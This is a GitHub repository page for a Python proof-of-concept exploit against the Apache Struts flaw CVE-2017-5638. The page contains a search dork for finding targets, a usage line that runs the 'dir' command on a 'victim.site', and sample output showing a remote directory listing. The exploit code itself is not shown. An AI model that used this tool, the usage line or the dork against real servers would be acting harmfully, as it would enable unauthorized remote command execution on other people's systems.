Skip to content

Example PoC Code for CVE-2017-5638 | Apache Struts Exploit

Notifications You must be signed in to change notification settings

xsscx/cve-2017-5638

Repository files navigation

CVE-2017-5638 PoC Code in Python | DORK: ext:action

Example PoC Code for CVE-2017-5638 | Apache Struts Exploit | DORK: ext:action

USAGE: python struts.py https://victim.site dir

The initial Python Script that was Posted didn't correctly format the Content-Type Header. I recoded the Content Type Header to properly format Content-Type:%20{Exploit}. I also added a logging and Requests, then dumped the Object Properties to stdout.

SAMPLE OUTPUT

Check for CVE-2017-5638 by XSS.Cx

Volume in drive D has no label. Volume Serial Number is 2A7B-A245 Directory of d:\Program Files\Apache Software Foundation\Tomcat 9.0

About

Example PoC Code for CVE-2017-5638 | Apache Struts Exploit

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages